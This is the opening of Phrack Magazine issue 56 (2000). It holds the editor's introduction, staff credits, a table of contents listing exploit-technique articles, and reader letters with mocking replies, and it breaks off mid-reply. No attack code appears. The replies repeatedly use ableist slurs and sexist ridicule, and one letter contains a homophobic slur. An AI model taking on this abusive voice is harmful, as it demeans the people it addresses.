+---=0x5b 0x72 0x65 0x67 0x69 0x73 0x74 0x65 0x72 0x65 0x64 0x20 0x20 0x68=---+ | a_ _y 88888888 ad8888ba, | | MM MM[ 88 8P' "Y8 | | __ __ M _, __ __ ____ __ _ B[___ 88 ---- d8 | | 0Mm0M0_ MMMM_ #MmMMm 0MM0y _MMMMF #[MMM 88a8PPPP8b, 88,dd888bb, | | MP ~~0 Mf "M BM' Y ~ BF BP ~MF #_#F PP" `8b 88P' `8b | | 0 M M M 4f m000F M ~' #MM d8 88 d8 | | #y _M M M #l 4M ]F M_ _ #MMk Y8a a8P 88a a8P | | 0MmmMf yMg mMs m0mmm 4& M0r R0mmmP mMf~Mmr "Y88888P" "Y88888P" | | M~"" """ "*` 9MMP^ PM"~P' ~M"~ "^ "^' | | M | | M | | MMM# | +---=0x65 0x78 0x20 0x20 0x6f 0x66 0x66 0x65 0x6e 0x64 0x65 0x72 0x7a 0x5b=---+ Volume 0xa Issue 0x38 05.01.2000 0x01[0x10] |-------------------------- I N T R O D U C T I O N --------------------------| |-----------------------------------------------------------------------------| |------------------------- J'envoie la sauce! b00m! -------------------------| In much of the same SPECTACULAR fashion you've come to expect, here iz your 56th god damned issue of Phrack mutherfuckin' Magazine. Late? Nono. Late would imply that there exists a publishing schedule of some sort. We now know this really isn't the case. So, in actuality, this issue may in fact be early. We have our best people looking into it... Riotz and protestz and retardz, OH MY! JESUS CHRIST PEOPLE. This whole Elian Gonzalez debacle can just goto hell. And of course I mean that figuratively speaking. I'm not so callous or jaded as to wish harm on an innocent child, but I speak for a significant majority of people when I say: "Enough is e-fucking-nough". Since November of 1999, the U.S. Government has entangled itself in an embroiled political, social and economic mess that just needs to END. Ok, here's the whole story in a nutshell. Around Thanksgiving of last year, this fisherman finds a kid floating in an innertube a few miles from Pompano Beach, FL. The fisherman does what any God-fearing Samaritan would do: he pulls the kid out of the water and takes him to the hospital. So the saga began... And here's how it should end: Elian should go back to Cuba with his biological father. Sure, Cuba sucks, but this is a six-year-old child whose father wants him to come home. Since when is it the US Government's job to act as social services for a sovereign Communist Country family? Oh, by the way, this has cost the U.S. Taxpayer more than $580,000 so far. And it's not over. Anyhow... As it happens, apparently Elian has some (distant) relatives in the US who managed to sneak out of Cuba. Congratulations. Good for them. So somehow, these people seem to think they have a stake in all this. Wonderful. Kids come running for the great taste of fifteen minutes of fame! Ok. And what about these relatives? Well, they're nutz, for one. Second of all, they're hardly "close" relativez. What, that one nutty chick is his second cousin? Does that even count? Great-uncles, and their brothers aside, a boy's FATHER is his FATHER. Crikey. If this was *my* kid, I'd be like: "Ok, junior, get in the fucking car, we're going home". Do any of these superfluous people realize what they're doing? Nevermind the fact that this little boy is probably going to be scarred in some horribly repressed fashion, and all the money this is costing... Wait no.. Actually that's pretty much the crux of the issue. Well, my issue with it. I'm just sick of it. Gawd. And what the hell is up with all the rioters? Thuggish lowbrows seen on CNN yelling "FUCK THIS COUNTRY" (after the INS snatch). Hey guess what retard? If you don't like, go the fuck back to Cuba. Like you even know what you're upset about. You just wanted an excuse to break shit and burn things (which they did do). AND FOR THE LOVE OF GOD, WHAT ABOUT THE FISHERMAN? WHAT STAKE COULD HE POSSIBLY STILL HAVE IN ALL THIS? Keep stretching those 15 minutez there buddy! I must say though, the open weeping on national television was very nice. "The Sensitive Fisherman". Rite. GET BACK OUT THERE AND CATCH ME SOME DOLPHIN-SAFE TUNA. Oh, and did I mention that someone named "Jesus Lizarazo" registered eliangonzalez.com? Who the crap hell iz that? Stop the insanity. Oh, by the by, there'z obviously been an overall format change. Nothing too major but I got real bored with the old one. I think the racing stripez add a nice touch. Oh, and I hope you like Hex. Coz I shure do. Sorry. No Phrack World News this time around. But how many of you guyz actually read it anyway? *shrug* Enjoy. |-In Fucking Charge Guy ----------------------------------------------- route-| |-Associate Editor ---------------------------------------------------- kamee-| |-Vhost Trooper ------------------------------------------------------- felix-| |-Phrack World Newz -------------------------------------------------- -| |-ASCII art from 1989 and Caucasian MixMaster Kid --------------------- swern-| |-F*cking N*tz ------------------------------------------------------- silvio-| |-Elite --------------------------------------------------------------- nihil-| |-Unbearably Bearish ------------------------------------------------- NASDAQ-| |-Microsoft / 2 ----------------------------------------- Two huge monopolies-| |-Prom Queen ------------------------------------------------------------- dk-| |-Kisses Like a Girl ------------------------------------------------- shinex-| |-Special Thankz ---------------------------------------------- sasha, twitch-| |-Shout Outs ----------------------- incr, frontline, no_ana, alia, miff, udp-| Phrack Magazine Volume 10 Number 56, May 01, 2000. ISSN 1068-1035 Contents Copyright (c) 2000 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available to the public, as often as possible, free of charge. Go nuts people. And stop bitching. You don't pay for this shit. |--------------- C O N T A C T P H R A C K M A G A Z I N E ---------------| Editor in Chief: route@phrack.com Submissions: route@phrack.com Commentary: loopback@phrack.com Phrack World News: disorder@phrack.com |-----------------------------------------------------------------------------| Submissions may be encrypted with the following PGP key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use mQGiBDdmijIRBADrabrDFYw6PRDrRRZsgetOOGo8oGROn4/H7q4L7rLm7weszn4L 8j1zY4AV4f3jFis0A/AqXPicxUHz0I3L6PzTMg11mmLbcj6wnAvr78LZ65y3Z5aA PEm/F7fNqAzFl9MCnUWa+53eH0TBKW7JdjpfCELeXTMLNsJREjL7f5qvyQCg/xqD g7dUtdIiDb7tm5DRhWqgDmED/iPUmujMt5x40bmf135vjev1Rle3nhHIe4fh58a7 VkZOmzqz/s3LninBuWcmuyZWShVGd8Hhd758yt41Xe/YHtEW4jSzYtE/1woYmp0K sZnFt+zIVAEm1mcVVV9+qrpEKVmbBLTR/oa+6A+t5/hFUjriTpAQUGF0xLzXNLYu c7cSA/0Q0rziq5xyuPbtUMKWE9zhxrt/SwfhunWx/n2vm2q9eFPfWqb9fDVuFrtv gwpaPVJ2CbM6F6c21pNGqm8zrSO8TYzgTScBKM80wn7ase3RBth36++N/Oq4Zczm froc9Och7qkgdZ7TkPCuorsyMc1169DXBxBSGfiQ85ylUYrbrLQRTWlrZSBELiBT Y2hpZmZtYW6JAEsEEBECAAsFAjdmijIECwMBAgAKCRAWHraAlbJmQSdiAKCjaUrs InxTXebFlAX5aUmdEKsD1wCfRZMfzv3BvQMKa6Rmbwlfzat0DFS5Ag0EN2aKMxAI APZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mU rfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VH MGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2 azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMh LLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+c fL2JSyIZJrqrol7DVekyCzsAAgIH/jCj4drT8VSrxI2N3MlgkiQOMcaGLE8L3qbZ jyiVolqIeH+NEwyWzCMRVsFTHWfQroPrF30UsezIXuF0GPVZvlzSSB/fA1ND0CBz 9uK9oSYPwI8i513nMaF03bLWlB07dBqiDUcKgfm/eyPGu5SP+3QhVaERDnBOdolZ J6t3ER8GRgjNUyxXOMaZ4SWdB7IaZVph1/PyEgLLA3DxfYjsPp5/WRJcSbK3NZDG cNlmozX5WUM7cHwEHzmYSRDujs/e3aJLZPa7stS9YGYVPZcjxQoE6wr+jx4Vjps4 pW+f6iWvWEfYnYRJqzwe8318rX6OojqHttaQs8xNEqvPOTfkt12JAD8DBRg3Zooz Fh62gJWyZkERAj61AJ41XyTBasgKKYlOVnI4mWZYJemQIQCgiqaTkhpM6xCnqKD9 BKnOvDsNc44= =IQ3Y -----END PGP PUBLIC KEY BLOCK----- phrack:~# head -20 /usr/include/std-disclaimer.h /* * All information in Phrack Magazine is, to the best of the ability of the * editors and contributors, truthful and accurate. When possible, all facts * are checked, all code is compiled. However, we are not omniscient (hell, * we don't even get paid). It is entirely possible something contained * within this publication is incorrect in some way. If this is the case, * please drop us some email so that we can correct it in a future issue. * * * Also, keep in mind that Phrack Magazine accepts no responsibility for the * entirely stupid (or illegal) things people may do with the information * contained herein. Phrack is a compendium of knowledge, wisdom, wit, and * sass. We neither advocate, condone nor participate in any sort of illicit * behavior. But we will sit back and watch. * * * Lastly, it bears mentioning that the opinions that may be expressed in the * articles of Phrack Magazine are intellectual property of their authors. * These opinions do not necessarily represent those of the Phrack Staff. */ |--------------------- T A B L E O F C O N T E N T S ---------------------| 0x01 Introduction Phrack Staff 0x18 K 0x02 Phrack Loopback Phrack Staff 0x64 K 0x03 Phrack Line Noise various 0x6c K 0x04 Phrack Prophile Phrack Staff 0x1c K 0x05 Bypassing StackGuard and StackShield Bulba and Kil3r 0x36 K 0x06 Project Area52 Jitsu-Disk... 0x50 K 0x07 Shared Library Redirection via ELF PLT Infection Silvio 0x32 K 0x08 Smashing C++ VPTRs rix 0x6c K 0x09 Backdooring binary objects klog 0x46 K 0x0a Things To Do in Cisco Land When You're Dead gaius 0x26 K 0x0b A Strict Anomaly Detection Model for IDS sasha / beetle 0x28 K 0x0c Distributed Tools sasha / lifeline 0x3e K 0x0d Introduction to PAM Bryan Ericson 0x20 K 0x0e Exploiting Non-adjacent Memory Spaces twitch 0x38 K 0x0f Writing MIPS/Irix shellcode scut 0x3a K 0x10 Phrack Magazine Extraction Utility Phrack Staff 0x2a K Total 0x3ba K |-----------------------------------------------------------------------------| "...IMHO it hasn't improved. Sure, some technical aspects of the magazine have improved, but it's mostly a dry technical journal these days. The personality that used to characterize Phrack is pretty much non-existant, and the editorial style has shifted towards one of `I know more about buffer overflows than you` arrogance. Take a look at the Phrack Loopback responses during the first 10 years to the recent ones. A much higher percentage of responses are along the lines of `you're an idiot, we at Phrack Staff are much smarter than you.`..." - Trepidity apparently still bitter at not being chosen as Mrs. Phrack 2000. |EOF|-------------------------------------------------------------------------| - P H R A C K M A G A Z I N E - Volume 0xa Issue 0x38 05.01.2000 0x02[0x10] |------------------------------ L O O P B A C K -----------------------------| |-----------------------------------------------------------------------------| |-------------------------------- phrack staff -------------------------------| Phrack Loopback is your chance to write to the Phrack staff with your comments, questions, or whatever. The responses are generally written by the editor, except where noted. The actual letters are perhaps edited for format, but generally not for grammar and/or spelling. We try not to correct the vernacular, as it often adds a colorful -even colloquial- perspective to the letter in question. |0x01|------------------------------------------------------------------------| Hackesses... by MiStReSS DiVA My name is MiStReSS DiVA...and I am a hackess... [ Who said what now? A hackess? Is that some sort of delicious pastry treat? ] "Girls can't hack...," I've heard this more times than not [ Hrm. I usually hear "girls cant do such-and-such az good az guyz" or "women shouldn't vote", or the ever popular "YOU WANT ANOTHER BLACK EYE? NO? GOOD! GET BACK IN THERE AND MAKE ME A PIE." ] at hackers conventions and the like. Well, I have some news for everyone; [ They're bringing back Perfect Strangers? ] There are women hackers, and our numbers are rising. [ Oh. Damn. I really miss Balki. ] Let's think about it for a moment-Women have always taken second seat to men, especially in the computer industry and business. [ There'z a reason for this... No.. Hrm. There really isn't. ] Over 75% of jobs in computer industries and taken by men. [ How do you think we feel? Over 75% of the jobs in the baking and sewing industries are taken by women! ] So, it's no surprise that there aren't many women in hacking. There's the issue of some hacking activities being illegal. [ Don't discount the major issue that hacking activities have nothing to do with makeup, shopping at strip mallz or gold digging! ] Many women want to stay as far away from situations like that as possible. I know many girls who don't even drink or smoke illegally, no less break into a UNIX server, let alone know what one is. [ I bet these are the same chickz who turn me down when I ask them out. Course, all chickz turn me down when I ask them out so I guess it'z a moot point. :( ] Then again, maybe we don't hear about them because there ways are much more cleaver than that of a man. [ Ok, I'm calling a no-way on this sentence here. As in "no-way are you *this* retarded". ] Women, and I'm applying this to myself as well, are naturally more sneaky and watchful. [ If by sneaky and watchful you mean conniving and vindictive then I agree with you. ] I know for a fact that women have hacked into sites and to systems, [ Ah yes. Thiz bringz me back. I remember one little minx who hacked her way right into my heart. Did me up real good too, she did. ] but why do we still get no credit in the underground community? [ End this suffrage of innocent hackess' now! ] Is it because we hid ourselves behind handles [ Maybe it iz becuase you have love handlez? ] and tags, [ Nametagz? Like at Walgreenz? ] or because people don't want to actually give us the credit. [ Well, personally, after reading this, I wouldn't give you a shred of credit either. ] I have only heard of three cases where females were caught in a hack. [ Shit. 3? I can remember the great `chickhack `96` when 423 girlz were all caught hacking. I think their major flaw was that they all tried to break into bebe.com at the same time. :( ] One girl got caught because while sending a file, she sent it to the wrong location on a server. [ What like C:\windows\desktop? ] One was caught for phreaking, and the other one for obtaining products from an internet site by gaining root access and shipping them to her home, free of charge. These are the only three cases I have found. And they were all stupid reasons to get caught. I know there are many people out there who hack and don't get caught, but the majority that do get caught, are men. We don't do stuff like the chick from hackers, nor do we dress or act in that manner. [ Well, I think we've identified your problem. Angelina Jolie pretty much sumz up whut everyone wantz to see in a hackess. Mmmm. Delicious hackess treats. ] We go about our lives like most human beings, maybe even a little better. [ Or in your case, a little dumber. ] We don't dress in all black, nor are we interested in only computers. We are intelligent and beautiful. We are the Hackesses. [ Mmmmmm. Hostess Hackesses. ] Mistress Diva |0x02|------------------------------------------------------------------------| Hi, my name is Adam and am regular guy with a home pc who is being hacked and violated by a military freak.. [ Military freak like Klinger on M.A.S.H. or military freak like that guy in Commando who wore the chain mail shirt? ] seriously no shit. [ Oh. Ok. I though you were pulling my leg for second. Sorry... Back on the clock now. ] i dont know where to start to ensure my pc security [ Well if you didn't have a PC you wouldn't have this problem. I say get rid of it. The end justifies the means. ] please reccomend some high level security methods and programs. [ Have you tried ignoring it? That sometimes works for me. Barring that, have you tried dealing with him? I find that freaks (especially military freaks) are usually pretty cordial when you deal with them on their terms. I say give in to his demands. ] if you cant do that then please reccommend any links i have found your site usefull because you provide elite items therefore i require your help please. [ The highest level of security I can think of is God. I recommend you pray each night, and I'll forward this to him. Together we *can* make a difference. ] Adam Smith |0x03|------------------------------------------------------------------------| Page 2 is hilarious ... P55-02 ... scrap the rest and just keep publishing that page. For issue #56 just republish one of the way older editions, it seems they are FINDING THOSE ONES!!@!@. :) [ HAHAHAHAHHAHAHAHA. Wait. I don't get it. ] P.S. I don't have a computer either, I'm sending this via DSS and I'm typing on the Remote Control. [ What do you mean, `either`? Wait, is this Adam from above? Hey man, did you do what I recommended? Did it work? The forward to God bounced so I wasn't sure if anything happened. Good for you man! ] Anonymous |0x04|------------------------------------------------------------------------| Hi, Let me explain what I need for the job I do. I have what we call mystery diners which visit my restaurant each month, this is done by a firm called MARITZ in Berkshire, what I would like is the dates when they visit my restaurant so I can make myself available for the visit day, is this possible in any way. [ If you knew then there wouldn't be any more mystery to it, now would there? What fun is that? ] Gary |0x05|------------------------------------------------------------------------| Does the author of article 52-9 have a degree in literature? [ Definitely not. However, I think he has a degree in money management. Well, maybe not. But he's SO very good with money. Maybe he just likes it alot. Maybe it's something ingrained into his personality or culture... ] If so, I think we made some sashimi together. [ Maybe it was bagels? ] HeftyNuts [ Hrm. Do you get around ok? Do you have a little wheelbarrow you put them in? ] |0x06|------------------------------------------------------------------------| Hey Route, Just wanted to compliment you on Phrack 55. It's very well done, excellent articles, very clean and professional, and the Loopback is hilarious, as always. Exactly what it should be, and a lot more. Well done, keep up the good work and spreading the info. Thank you for spending your time to bring this to us. [ SEE!? Some people actually DO like me! ] EchoMirage |0x07|------------------------------------------------------------------------| I came to this page to see what kind of fucked up, twisted, LOSERS would run something like this! [ Just your average run-of-the-mill sexier-than-cheescake losers. The kind with luscious filling. ] Phracked! Phracked!?! Boy, was I an ass. [ Was? ] The editors comments are the funniest damn thing on the net right now. [ I'm slicker this year. ] No kiddin'. It's hilarious the number of people who think he's Percy -fuckn'- Ross [ Yah. The current count is at 384572. ] some sorta hacker dogooder out there to free humanity (or save little boys knee deep in there own shit). You guys are hilarious. I'll be back to read some more, please, keep up the good work. A New Fan [ 384573. ] |0x08|------------------------------------------------------------------------| Hi - My name is Dawn, I think your commentary on other people's articles are absolutely hilarious and if you're not doing anything on Friday, I'd like to... [ HOLY FUCK YOU'D LIKE TO WHAT?!@#!# ] just kidding!! [ SWEET FUCKING CHRIST GIRL! DON'T EVER DO THAT TO ME. DO YOU KNOW WHERE I'M COMING FROM? (A COLD LONELY PLACE WITH NO GIRLZ). ] Anyways! I just wanted to tell you how funny I think you are and I will now become an avid reader of Phrack because of your comic sarcasm! [ How about you become an avid reader due to my irresistable charm and unending appeal! *wink* *wink* *puppy dog face* ] ;P love, Dawn [ Love??@?#!?@#? OMGOMGOMGOMGOMGOMG! I'm getting butterfliez in my tummy! ] Talk to you later I hope! [ Dawn, do you by *any* chance happen to like food or sleeping or procreation? If so, I think we may have some thingz in common and we definitely need to get together as soon as possible. Please write me back as soon as possible, only if you're hot though. ] |0x09|------------------------------------------------------------------------| Helu, First off, much thanks to the Phrack staff for producing a wonderful publication.. regardless of _WHEN_ they come out. I have found them very informative since the current group tookover the whole process. [ Group? Paha. I wish I had a staff. It'z just me and my mom dude. She doez the writing and I do the copy and editz. ] I read the article on "Building Bastion Routers Using Cisco IOS", [ (p55-10). ] which was a decent piece and contained a lot of basic IOS information that would apply to building a bastion router. There was a part of a section however that I felt should've been covered a little more accurately, [ WELL PREACH ON BROTHER!@ ] which was in the section entitled "Step 2 : Limit remote access". The article mentions that there have been rumors that SSH would make it into Cisco IOS 12.0, however it never made it in. Now, I'm not certain when the actual article was written so it may just be that the article has old information. Nonetheless, there is SSH support included in Cisco IOS 12.05(S) and it works like a charm. A few things worth noting about Cisco IOS 12.05(S): -- It is the preferred and recommended IOS release for Internet backbone routers as well as for service providers ( i.e. perfect candidates for bastion routers ). -- It runs on enterprise class routers. Meaning the image runs on the following hardware: 7200, 7500, and 12000 (GSR) series routers. -- It was released in July of 1999. So there are a lot of people that aren't running their operation on enterprise class routers, however a ton of NSPs and ISPs do; thus this information about SSH is worthy of mentioning. Anyways, keep up the excellent work. [ Thankz for your input! ] Craig |0x0a|------------------------------------------------------------------------| Gentlemen, I enjoy reading your issues when you get them out and all I have to say is keep up the good work. ArgentRisk [ See, I just like to pepper a few of these babies in here so you people know that there are a precious few who like me and my mom. ] |0x0b|------------------------------------------------------------------------| Dear Sultan of Love, et al., [ Huh. ] I wanted to give some of your readers help on some of the stuff they sent in. One, get serious help. [ Ok thankz! ] Two, check out the book "PIHKAL: Phenylalanines I Have Known and Loved." I can't remember who it's by, but it's got everything you ever wanted to know about psychotropics, psychodelics, and more... much, much more. Read and practice at your discretion. [ You suck. You recommend a book _you_ can't remember with some goofy-ass title _I_ can't remember? ] Three, I lived in Japan and had peanut butter sent to me, because peanut butter made in Japan is awful. [ It didn't use to be. Back in the 1920's and 1930's Japanese peanut butter was considered to be the best in world. Mercenary ronin were often paid off with jars of the stuff. This all changed after WWII. Recently declassified State Department documents bring light to the fact that several key strategic targets during WWII bombing raids were the Japanese peanut butter factories. The documents list the reason for the strategic importance as "creamy goodness". Pundits charge however that the U.S. just couldn't live with Japan having the peanut butter edge. Either way, we bombed the Japanese peanut industry back into the stone age. ] The guy who talked about smuggling drugs into Japan in peanut butter has really fubar'd. Some poor shmuck in Japanese customs is going to be opening up my decent edible peanut butter. For godsakes, guys, necessity may be the mother of invention, but sometimes it's just a mother. [ LEAVE MY MOM OUT OF THIS, JERKOFF! ] Leave well enough alone. [ Now why on earth should our drug-loving friends in Japan be held hostage by your desire to eat 'Jiffy' instead 'Mister Super Happy Fun Peanut Butter Joy'? ] Lastly, I actually don't have a thing to say about computers. I'm a med student and know next to nothing about computers. I just wanted to let you know that you guys are so funny you put me in tears. Do you really have a hard time meeting chicks?! [ Not meeting them, no. Just talking to them. I tend to drool. ] I don't believe it. [ Are you coming on to me? ] Uma [ Goddess? ] |0x0c|------------------------------------------------------------------------| Hi! I wondered if you could help me to crack userpasswords from PWL-files. [ Do you often submit passing musings to Underground Journalz? ] I'm having a project about computer security at school and it would be nice to have this as an example. [ I'm having a hard time caring. ] Tom Erik Gundersen |0x0d|------------------------------------------------------------------------| [ (p55-17). ] Someone please tell our friend here that Cisco has already implemented dynamic access control for the H.323 protocol starting with version 12.0 of the IOS software (in the firewall extension -12.0fw-). [ Done! ] Anonymous |0x0e|------------------------------------------------------------------------| I've just finished studying a copy of the K&R/ANSI C tutorial I found in my library, and I'm very interested in moving onto writing C programs that use the serial or parallel ports. [ Excellent reference book. ] I'm trying to create my own simple electronic devices to connect to my computer, but I am having locating a good resource or tutorial that discusses serial/parallel port programming. Could you give me a good site please? [ http://www.eng.auburn.edu/users/doug/serial.html and http://www.syclus.com/cscene/CS4/CS4-01.html are decent. ] BTW, the mag is great. Keep up the good work :) [ Thankz. Good luck with your programming! ] Anonymous |0x0f|------------------------------------------------------------------------| Hey, i was browsing through the web and i came to your page, i was just wondering what Phrack Magazine actually was about, the articles seemed really intereting and i want to get a subscription. The web site didn't explain a lot for me, i'm sorry for bothering you, thanks a lot. [ Do you get tired putting your socks on? Do you get lost on your way to the kitchen? You may be retarded. Check with your family doctor. ] Anonymous |0x10|------------------------------------------------------------------------| My name is route and I'm so elite that I have to make love to my hand three times a day. [ YA-HA. I wish! Three times a day in some fantasy world maybe! No, I'm pretty much a one timer, then it'z rite off to sleep! ] I can't get rid of all the spots on my silly geeky face [ They told me the radiation burns would go away after a few months. :( ] and I'm still a virgin. [ Hah! Apparently SOMEONE hasn't been checking the #hack sexchart: http://www.escape.com/~max-q/sexchart.shtml)! ] Why are all hackers such fucking losers? [ Why are there so many, songs about rainbows? ] All the articles in phrack could have been written by a 12 year old. [ Man. That would have to one 12 year old with ALOT of free time. ] Do any of you faggots even have any computing qualifications? [ I'll have you know, mister smartguy, that I got a degree from Devry! ] And have any of you ever even kissed a girl? [ Well, I've seen picturez of girlz being kissed, doez that count? ] Dr Robert Gray [ I'm almost positive the good doctor wanted people to email him there with commentz to his letter. ] |0x11|------------------------------------------------------------------------| Hello, I just wanted to write to tell you that I recently read the "Phrack Loopback" in Phrack55. I enjoyed the last letter about the McDonalds article so I decided to read it. I worked at Mc Donalds for a couple years back in High School, and let me tell you that this article had me laughing so hard I was crying. Keep up the good work. Ryan [ Crying because you worked at Mc Donalds for a couple yearz or crying because you've only moved up to Wendy'z? ] |0x12|------------------------------------------------------------------------| Hi, I know you have better things to do. [ Nope! Not really! ] But I didnt know who to turn to. [ Did you try the A-team? I hear that if you have a problem, if no one else can help you and if you can find them, maybe you can hire: the A-team. ] I had my tax documents and other stuff protected with encypted magic folders. [ Hrm. Are we talking David Copperfield kinda magic or Merlin kinda magic? ] I got the whole thing copied to a CD. The only thing i did wrong was that I didnt decrypt it. After that I was having problems with my software so I formatted my hard drive. [ Geeze. Way to go moron. ] Now the problem is that I have lost my recovery floppy. [ Hhahahaha! Holy shit that sucks! ] I dont know how to access the files. I have them on the CD but they are all encrypted and stuff. What should I do. I really do need your help. Please do reply, Ali Tariq p.s. If you want me to send a file (encryted one) I will send it so that you can test different utilities on it. [ Of course! Want me to do your taxez if I crack the file too? ] |0x13|------------------------------------------------------------------------| My brother has spent the last week reading Phrack. He's a total fucking idiot (doesn't run in the family, maybe he's adopted... I can only hope for so much) and now he thinks he's a hacker. He goes into chat rooms and threatens to send people viruses when he can't even tie his own fucking shoe laces! [ Yeah, but with the advent of velcro who needs to tie their own shoes? ] Shame on you for letting total fucking retards read Phrack! [ We let you read Phrack. ] Linux Bitch [ Well, "Linux Bitch", Phrack is an equal opportunity magazine. We don't ostricize the retarded simply because they may drool ocassionally or maybe sit in their own filth. Nay. We encourage people of all levelz of retardation to bask in the wealth of knowledge that each little character brings. We believe that knowledge is meant to be free, and sometimes knowledge seeks out the path of least resistance, and sometimes it takez more difficult route. Ok, and sometimez knowledge just quitz half-way there and goez drinking with hiz buddiez. I totally forgot my point. |0x14|------------------------------------------------------------------------| Hey What is u? r comments about scientists who's creating machines thinking like humans, as well as looking as humans - so called humanoids? Does it scares u or do u not care? I'm searching for people who can fight Artificial Intelligence back. People with H/C/P skills as well as explosives. Please mail me ASAP, it's urgent. It's our future. Q Wakee [ Mister Wakee, this is a problem that I have seen coming since Atari'z Pong first entered, nay --invaded-- our homez. I've been waiting for a man of action to step forward for a long, long time. In fact, since 1990, I've been running my own underground resistance (it'z called HAHA (Humanz against hostile androidz)). Until now, I thought I was the only one (my resistance has a membership of 1 (one)). We should definitely team up and fight this disgusting menace together. I'll bring the doughnutz and lotion, you bring the robot stopping gunz. Do you have any brochurez? I've been working on one entitled "So You Want to Stop Humanoid Robotz". It'z pretty much industry standard boilerplate stuff, with pop-ups of me shooting robots and some scratch-and-sniff conspiracy theories. Please let me know when we can have our first meeting, oh we'll have to use your compound because my mom doesn't let me have people over anymore. ] |0x15|------------------------------------------------------------------------| im confused, what do u guys actually do at phrack? [ Phrack is a puppet company setup by the CIA to covertly gather intelligence on the tragically retarded. It's been a goldmine! ] Anonymous |0x16|------------------------------------------------------------------------| 1) Phrack's cool [ Like Norway! ] 2) Im makin a page on x-plosives etc. Ive noticed a few of your ish's contain xtracts from the Poor Man's James Bond. If whoever of you haz it could advise me as to were I could get a phile of this, or send me one, [ http://www.darwinawards.com/legends/legends1999-10.html ] or publish more ish's with anarchy stuff, it'd be k-appreciated. [ You're a k-idiot. ] Anonymous |0x17|------------------------------------------------------------------------| Glad to have you back and many thanks. [ Well I'm glad to have YOU back mister toughguy! ] Always enjoy the articles. Nice job frying the fools too. About had me out of my chair. Pardon the lame e-mail addy, but visiting the folks right now. [ Yah, how iz mom'z sexual-addiction treatment coming along? ] Symbolic constant, very good, wish I'd thought of it. [ Paha! BUT YOU DIDN'T, DID YOU? I DID! PROPZ TO ME! ] Guess I'll have to renew the Phrack link on my page. [ SAINTZ BE PRASIED! ] Put ya next to Fyodor. [ Gee, nestled between one-hit wonder Fyodor and probably antionline, wonerful. I'll listen to you now and kill myself later. ] Hasta, Spiny_Norman [ Like Norman Fell, t.v.'z Mister Roper from Three'z Company? (A poor man'z Don Knottz if you ask me.) ] |0x18|------------------------------------------------------------------------| In my English class for school we were asked to write a persuasive essay about anything we wanted. At first I was going to do mine on 'Are their really extraterrestrials?' [ HOLY SHIT THAT'Z AWESOME! ] But I decided that was stupid [ Oh wait, you're right. Idiot. ] and found I know more about hacking then anything. [ Uh huh. ] The only problem is, I have no clue what question to answer. Got any ideas??? Anonymous [ How about `Why I'm a Retard by Anonymous Dork` or `Why I Know More About Hacking Than Anything (subtitle: and I really don't know anything about anything` or `Darwin Was Wrong: An Essay On Me`. ] |0x19|------------------------------------------------------------------------| how do i get other people's IP addres?? do u know? [ Oh yes. OH YES. I know. Absolutely I do. I know this little arcane tidbit. No way am I telling you though. NOooooooo Way. I can't just be giving away all the secretz can I? ] Anonymous |0x1a|------------------------------------------------------------------------| Greetings, just in case the folks who write to you asking for manuals for Darwin Award Delivery Devices are not sufficiently intimidated by your usual "you will die, I hope you understand" response, I thought I'd pass this info along: at least Massachusetts, though probably many other states as well, has what it calls an Infernal Device law. This law defines an "infernal device" loosely to cover things that will get idiots killed in their parents' basement, and then bans it. So it's not just the Grim Reaper who awaits people who try to put lighter fluid in their supersoakers, but also The Man. #include UnhandledVagrant22 [ Hrm, how are the other 21 unhandledVagrantz doing anyway? Any of you found work yet? You know, the life of a hobo, while seeming glamorous and sexy, isn't all the brochurez make it to be. Come home. Your mother and I miss you terribly. ] |0x1b|------------------------------------------------------------------------| I am really sorry to bother you with this question but I am desperate. [ I'm desperate too, but prolly a different kind of desperate. ] I know that there is a folder on the PC that stores all the mail you have ever written. Even mail that you have deleted. As you can see I am on AOsmelL. I wrote some mail at work and on Monday morning, if not sooner... my boss is going to see it. Where is that file? I have to get to it so I can get the mail out of there. [ If you're going to have an affair with your boss's wife at least be smart enough to NOT write her love letters on HIS computer. Haha. Dummy. You're gonna be unemployed. ] Thank you in advance for any help you can give me. [ Move to a new town and start over. ] Anonymous |0x1c|------------------------------------------------------------------------| [ (p55-04). ] > There is also another reason why W. Richard Stevens is > featured here -- he was to be the prophile for Phrack 55. This is just all so incredibly sad. What a loss. Thank you for P55. [ Agreed. Thankz for your support and condolences. ] Yours, Josh Birnbaum (noOrg). |0x1d|------------------------------------------------------------------------| i think you should know that a well known hacker by the name of "the jolly rodger" (the one with the cook book), is extracting philes from the archives and putting them in his cook book with out giving the nessecery credit to the writers. [ Does he include recipes for crayon sandwiches? Coz that'z renz's personal recipe and he should definitely give due credit. ] he may say that the philes were writen by him,but the fact that they are written word for word, points to him as the cuprit. HACK SAW [ JIM DUGGAN? HEEEEYOH! ] |0x1e|------------------------------------------------------------------------| I AM IGOR. I AM BRASIL. I NOW UNDERSTEND VERY WELL OF INGLAS,. I NEED OF THE DRIVER FOR HAKCKERS, FOR ME INVASION THE COMPUTERS FROM THE PEOPLES. YOU UNDERSTEND?? [ I AM DISRESPECTFUL TO DIRT. CAN YOU SEE THAT I AM SERIOUS? ] OBS:CORCEL OF TROIA. IGOR [ OUT OF MY WAY, ALL OF YOU. THIS IS NO PLACE FOR LOAFERS! JOIN ME OR DIE! CAN YOU DO ANY LESS? ] |0x1f|------------------------------------------------------------------------| My name is Thomas and am currently still in what you would call in America as senior high. I'm 15 years old and found this Phrack page while i was surfing on the net. [ Well I see you've done your homework. Nice work Thomas! ] I've always wanted to become involved in the art of hacking and i really don't know how to really start i've had my computer for about 2 and some years and catch on to things preety well and was wondering where to go from here. [ Let'z plug that into the career calculator and see what she comes up with..... Ok.. Yes.. Let'z see here... - 30.98% Help desk for regional fast food new hire processing office - 30.56% Junior copier repair engineer - 15.40% NO CAREER FOUND - 12.45% Phone support engineer for the outdoor furniture industry - 10.61% 